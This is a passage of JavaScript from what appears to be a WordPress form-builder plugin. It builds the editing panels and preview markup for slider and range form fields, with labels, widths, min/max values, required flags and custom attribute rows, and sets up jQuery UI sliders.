		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.setAttribute("for", "el_choices_add");
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_slider')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_slider')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_slider')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_slider')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);

edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_slider_size_label);	
	edit_main_td3_1.appendChild(el_slider_size_input);
	
	edit_main_td4.appendChild(el_slider_min_value_label);
	edit_main_td4_1.appendChild(el_slider_min_value_input);
	
	edit_main_td5.appendChild(el_slider_max_value_label);
	edit_main_td5_1.appendChild(el_slider_max_value_input);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	edit_main_td7.appendChild(el_required_label);
	edit_main_td7_1.appendChild(el_required);
	
	
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br1);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_slider');

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_slider");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_slider_min_value = document.createElement("input");
		adding_slider_min_value.setAttribute("type", "hidden");
		adding_slider_min_value.setAttribute("value", w_field_min_value);
		adding_slider_min_value.setAttribute("id", i+"_slider_min_valueform_id_temp");
		adding_slider_min_value.setAttribute("name", i+"_slider_min_valueform_id_temp");		
			
	var adding_slider_max_value = document.createElement("input");
		adding_slider_max_value.setAttribute("type", "hidden");
		adding_slider_max_value.setAttribute("value", w_field_max_value);
		adding_slider_max_value.setAttribute("id", i+"_slider_max_valueform_id_temp");
		adding_slider_max_value.setAttribute("name", i+"_slider_max_valueform_id_temp");
			
	var adding_slider_value = document.createElement("input");
		adding_slider_value.setAttribute("type", "hidden");
		adding_slider_value.setAttribute("value", w_field_value);
		adding_slider_value.setAttribute("id", i+"_slider_valueform_id_temp");
		adding_slider_value.setAttribute("name", i+"_slider_valueform_id_temp");

	var adding_slider_width = document.createElement("input");
		adding_slider_width.setAttribute("type", "hidden");
		adding_slider_width.setAttribute("value", w_field_width);
		adding_slider_width.setAttribute("name", i+"_slider_widthform_id_temp");	
		adding_slider_width.setAttribute("id", i+"_slider_widthform_id_temp");
			
    var adding_slider_div = document.createElement("div");
		adding_slider_div.style.cssText="width:"+w_field_width+"px"; 
		adding_slider_div.setAttribute("name", i+"_elementform_id_temp");	
		adding_slider_div.setAttribute("id", i+"_elementform_id_temp");
	
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.cssText = "display:table-cell; vertical-align:top; width:"+w_field_label_size+"px;";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var slider_table = document.createElement('div');
		slider_table.setAttribute("id", i+"_slider_tableform_id_temp");	
		
	var slider_tr1 = document.createElement('div');	
	var slider_tr2 = document.createElement('div');	

	var slider_td1 = document.createElement('div');
		slider_td1.setAttribute("id", i+"_slider_td1form_id_temp");

	var slider_td2 = document.createElement('div');
		slider_td2.setAttribute("align", 'left');
		slider_td2.setAttribute("id", i+"_slider_td2form_id_temp");
		slider_td2.style.cssText = "display:inline-table; width:33.3%; text-align:left;";
			
	var slider_td3 = document.createElement('div');
		slider_td3.setAttribute("align", 'right');
		slider_td3.setAttribute("id", i+"_slider_td3form_id_temp");
		slider_td3.style.cssText = "display:inline-table; width:33.3%; text-align:center;";
			
	var slider_td4 = document.createElement('div');
		slider_td4.setAttribute("align", 'right');
		slider_td4.setAttribute("id", i+"_slider_td4form_id_temp");		
		slider_td4.style.cssText = "display:inline-table; width:33.3%; text-align:right; ";
		
	var br1 = document.createElement('br');
	
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		if(w_required=="yes")
			required.innerHTML = " *";
	var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_slider_width);
	div_element.appendChild(adding_slider_min_value);
	div_element.appendChild(adding_slider_max_value);
	div_element.appendChild(adding_slider_value);

	var slider_min = document.createElement('span');
		slider_min.setAttribute("id", i+"_element_minform_id_temp");
		slider_min.innerHTML = w_field_min_value;
		slider_min.setAttribute("class", "label");
		
	var slider_max = document.createElement('span');
		slider_max.setAttribute("id", i+"_element_maxform_id_temp");
		slider_max.innerHTML = w_field_max_value;
		slider_max.setAttribute("class", "label");

	var slider_value = document.createElement('span');
		slider_value.setAttribute("id", i+"_element_valueform_id_temp");
		slider_value.innerHTML = w_field_value;
		slider_value.setAttribute("class", "label");		
		
	slider_td1.appendChild(adding_slider_div);
	slider_tr1.appendChild(slider_td1);
	slider_table.appendChild(slider_tr1);

	slider_td2.appendChild(slider_min);
	slider_tr2.appendChild(slider_td2);
	slider_table.appendChild(slider_tr2);

	slider_td3.appendChild(slider_value);
	slider_tr2.appendChild(slider_td3);
	slider_table.appendChild(slider_tr2);

	slider_td4.appendChild(slider_max);
	slider_tr2.appendChild(slider_td4);
	slider_table.appendChild(slider_tr2);

	div_element.appendChild(slider_table);
	
	
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br1);
	main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_slider');
	jQuery("#"+i+"_elementform_id_temp")[0].slide = null;

	jQuery(function() {
		jQuery( "#"+i+"_elementform_id_temp").slider({
			range: "min",
			value: eval(w_field_value),
			min: eval(w_field_min_value),
			max: eval(w_field_max_value),
			slide: function( event, ui ) {
				document.getElementById( i+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
				document.getElementById( i+"_slider_valueform_id_temp" ).value = "" + ui.value; 	
			}
		});
	});
}


function change_slider_min_or_max_value(a,id,form_id, min_or_max)
{ 
	document.getElementById( id+"_element_"+min_or_max+"form_id_temp" ).innerHTML=a;
}


function change_slider_width(a,id,form_id)
{
	document.getElementById( id+"_elementform_id_temp" ).style.cssText="width:"+a+"px";
	document.getElementById( id+"_slider_widthform_id_temp" ).value=a;
}

function change_slider_min_value(a,id,form_id)
{
	document.getElementById(id+"_slider_min_valueform_id_temp" ).value=a;

	if(eval(a)> document.getElementById(id+"_element_valueform_id_temp" ).innerHTML)
	{

		document.getElementById(id+"_element_valueform_id_temp" ).innerHTML = a;
		document.getElementById(id+"_slider_valueform_id_temp" ).value = a;
			
		jQuery( "#"+id+"_elementform_id_temp").slider({
				min: eval(a),
			slide: function( event, ui ) {
			document.getElementById(id+"_element_valueform_id_temp").innerHTML = "" + ui.value ;
			document.getElementById(id+"_slider_valueform_id_temp" ).value = "" + ui.value;
			}
		});

	}
	else
	{
		jQuery( "#"+id+"_elementform_id_temp").slider({
			min: eval(a),
			slide: function( event, ui ) {
			document.getElementById(id+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
			document.getElementById(id+"_slider_valueform_id_temp" ).value = "" + ui.value;	
			}
		});
	}

}

function change_slider_max_value(a,id,form_id)
{
	document.getElementById(id+"_slider_max_valueform_id_temp" ).value=a;
	if(eval(a) < parseInt(document.getElementById(id+"_slider_valueform_id_temp" ).value)) {
		document.getElementById(id+"_element_valueform_id_temp" ).innerHTML = a;
		document.getElementById(id+"_slider_valueform_id_temp" ).value = a;
			
		jQuery( "#"+id+"_elementform_id_temp").slider({
			min: eval(document.getElementById(id+"_slider_min_valueform_id_temp" ).value),
			max: eval(a),
			value: eval(document.getElementById(id+"_slider_valueform_id_temp" ).value),
			slide: function( event, ui ) {
			document.getElementById(id+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
			document.getElementById(id+"_slider_valueform_id_temp" ).value = "" + ui.value;	
			}
		});
	}
	else {
		jQuery( "#"+id+"_elementform_id_temp").slider({
			min: eval(document.getElementById(id+"_slider_min_valueform_id_temp" ).value),
			max: eval(a),
			value: eval(document.getElementById(id+"_slider_valueform_id_temp" ).value),
			slide: function( event, ui ) {
				document.getElementById(id+"_element_valueform_id_temp" ).innerHTML = "" + ui.value ;
				document.getElementById(id+"_slider_valueform_id_temp" ).value = "" + ui.value;	
			}
		});
	}
}

function type_range(i, w_field_label, w_field_label_size, w_field_label_pos, w_field_range_width, w_field_range_step, w_field_value1, w_field_value2, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value){

	document.getElementById("element_type").value="type_range";
	delete_last_child();	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
  	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
    var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');

	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');  
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');	 	
	var edit_main_td8 = document.createElement('td');
    var edit_main_td8_1 = document.createElement('td');	 
    var edit_main_td9 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
    var edit_main_td10_1 = document.createElement('td');	 
	
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;

	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");	
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");
		
	var el_range_width_label = document.createElement('label');
		el_range_width_label.setAttribute("class", "fm-field-label");
	    el_range_width_label.setAttribute("for", "edit_for_spinner_width");
		el_range_width_label.innerHTML = "Width ";
	
	var el_range_width_input = document.createElement('input');
		el_range_width_input.setAttribute("type", "text");		
		el_range_width_input.setAttribute("id", "edit_for_spinner_width");		
		el_range_width_input.setAttribute("value", w_field_range_width);	
		el_range_width_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_range_width_input.setAttribute("onKeyUp", "change_range_width(this.value,"+i+",'form_id_temp')");			
				
	var el_range_step_label = document.createElement('label');
	    el_range_step_label.setAttribute("class", "fm-field-label");
	    el_range_step_label.setAttribute("for", "edit_for_spinner_step");
		el_range_step_label.innerHTML = "Step";
		
	var el_range_step_input = document.createElement('input');
		el_range_step_input.setAttribute("type", "text");		
		el_range_step_input.setAttribute("id", "edit_for_spinner_step");		
		el_range_step_input.setAttribute("value", w_field_range_step);
		el_range_step_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
		el_range_step_input.setAttribute("onChange", "change_range_step(this.value,"+i+",'form_id_temp')");
    
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.setAttribute("for", "el_choices_add");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("id", "el_choices_add");
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_range')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
				el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_range')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_range')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_range')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);
edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	
	edit_main_td3.appendChild(el_range_width_label);
	edit_main_td3_1.appendChild(el_range_width_input);
	
	edit_main_td4.appendChild(el_range_step_label);	
	edit_main_td4_1.appendChild(el_range_step_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br1);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_range');
	
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_range");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_width= document.createElement("input");
		adding_width.setAttribute("type", "hidden");
		adding_width.setAttribute("value", w_field_range_width);
		adding_width.setAttribute("name", i+"_range_widthform_id_temp");	
		adding_width.setAttribute("id", i+"_range_widthform_id_temp");		
			
	var adding_step = document.createElement("input");
		adding_step.setAttribute("type", "hidden");
		adding_step.setAttribute("value", w_field_range_step);
		adding_step.setAttribute("name", i+"_range_stepform_id_temp");	
		adding_step.setAttribute("id", i+"_range_stepform_id_temp");

    var adding_range_input_from = document.createElement("input");
		adding_range_input_from.setAttribute("type", "");
		adding_range_input_from.setAttribute("value", w_field_value1);
		adding_range_input_from.style.cssText="width:"+w_field_range_width+"px"; 
		adding_range_input_from.setAttribute("name", i+"_elementform_id_temp0");	
		adding_range_input_from.setAttribute("id", i+"_elementform_id_temp0");
		adding_range_input_from.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			
    var adding_range_input_to = document.createElement("input");
		adding_range_input_to.setAttribute("type", "");
		adding_range_input_to.setAttribute("value", w_field_value2);
		adding_range_input_to.style.cssText="width:"+w_field_range_width+"px"; 
		adding_range_input_to.setAttribute("name", i+"_elementform_id_temp1");	
		adding_range_input_to.setAttribute("id", i+"_elementform_id_temp1");
		adding_range_input_to.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
			
	var adding_range_label_from = document.createElement("label");
		adding_range_label_from.setAttribute("class", "mini_label");
		adding_range_label_from.setAttribute("id", i+"_mini_label_from");
		adding_range_label_from.innerHTML=w_mini_labels[0];

	var adding_range_label_to = document.createElement("label");
		adding_range_label_to.setAttribute("class", "mini_label");	
		adding_range_label_to.setAttribute("id", i+"_mini_label_to");
		adding_range_label_to.innerHTML=w_mini_labels[1];
		
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
	
	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
	var div_for_editable_labels = document.createElement('div');
		div_for_editable_labels.setAttribute("class", "fm-editable-label");

	div_for_editable_labels.appendChild(edit_labels);  

	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		

	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var table_little = document.createElement('div');
		table_little.setAttribute("id", i+"_elemet_table_littleform_id_temp");
		table_little.style.display="table";
